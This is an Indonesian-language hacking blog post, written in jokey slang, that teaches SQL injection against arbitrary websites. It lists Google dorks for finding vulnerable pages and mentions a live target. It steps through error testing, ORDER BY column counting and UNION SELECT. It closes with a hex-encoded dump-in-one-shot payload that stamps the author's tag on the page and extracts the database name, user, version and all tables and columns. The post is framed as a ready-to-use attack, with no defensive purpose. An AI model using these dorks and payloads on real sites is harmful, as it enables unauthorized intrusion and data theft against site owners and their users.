Tutorial dan Cara SQL Metode Html Injection

Ditulis oleh Jumat, 04 Desember 2020 Tambah Komentar Edit

Hello Mates 🍻!!!


By : Mr. Kla


Hello Mates !!! Welcome Back !!!

Di kesempatan kali ini gw akan sharing tentang tutorial cara SQL Html Injection. Cara ini lumayan mudah dilakukan. Dengan test tanda kutip ' di angka website target yang diantara angka itu meski ada embel-embel subdomainnya atau dir nya.

Oke penasaran bagaimana caranya ? simak yuk langkah langkah berikut ini

Bahan  :
1. Dork
    inurl:/news.php?id=
    inurl:/index.php?id=

2. Query atau Dios atau Payload anda jika tidak ada bisa menggunakan punya kami yang gw sediakan nanti di langkah langkah nya.
3. Kesabaran
4. Sebats & Coffee nya jangan lupa
5. Doi buat penyemangat jika punya :(


Langkah - langkah :


1. Pertama kita dorking terlebih dahulu tapi sans gw udh ada live target pencet
2. Setelah itu kalian test web tersebut dengan memasukan tanda kutip ' setelah angka nya.





3. Jika blank atau muncul error syntax brati vuln hatinya


 


4. Tambahkan --+ atau --+- jika web tersebut kembali normal berarti langsung ungkapin persaaan lu selama ini ke dia :v

5. Kemudian masukan perintah seperti ini misal :
www.klagans.com/anjay-11' order by 1--+-/patch/

Nah jika tidak erorr naikin lagi angkanya misal :

www.klagans.com/anjay-11' order by 10--+-/patch
 

6. Jika udah ketemu error nanti akan blank lagi atau error

7. Oke pasti paham lah lu kan cewe selalu benar :v
8. Setelah itu kita eksekusi agar bisa temuin angka dios hatinya ! Angka dios hatinya gak tuh awoakwoak :v
9. Website tersebut error diangka 13 jadi kuragin satu kalo mau munculin dios nya jadinya kek begini :
www.klagans.com/anjay-11' and union all select 1,2,3,4,5,6,7,8,9,10,11,12--+-



10. Dan Boom ketemu tuh dios hatinya :v
11. Setelah itu kalian bisa print nick, image, database table, dll dengan query tim kami uwu :v
concat/**8**/(0x3c696d67207372633d22687474703a2f2f616e67656c7363796265726d6f6f6e2e6575352e6f72672f6173736574732f696d672f4c6f676f332e706e67222077696468743d22333530223e3c62723e0a3c63656e7465723e3c68313e4b6973736564204279204d722e204b4c41,0x273c62723e27,0x6461746162617365203a3a20,database/**8**/(),0x273c62723e27,0x75736572203a3a20,current_user,0x273c62723e27,0x706f7274203a3a20,@@port,0x273c62723e27,0x7665727369203a3a20,version/**8**/(),0x273c62723e27,0x6f70657261746f72203a3a20,@@FT_BOOLEAN_SYNTAX,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))


12. Dann Boom



Happy Inject Lads !!!


Special Thanks To  :
All Member


Thanks To :
1. Angels Cyber Moon
2. ClownSec Team
3. IndoAngelSec
4. Lolzsec Xploit Indo
5. Malang Xploit Cyber
6. Bekasi Blackhat
7. Bangkalan Security Xploit
8. And You mwahh :*

see you later lads !

Belum ada Komentar untuk "Tutorial dan Cara SQL Metode Html Injection"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel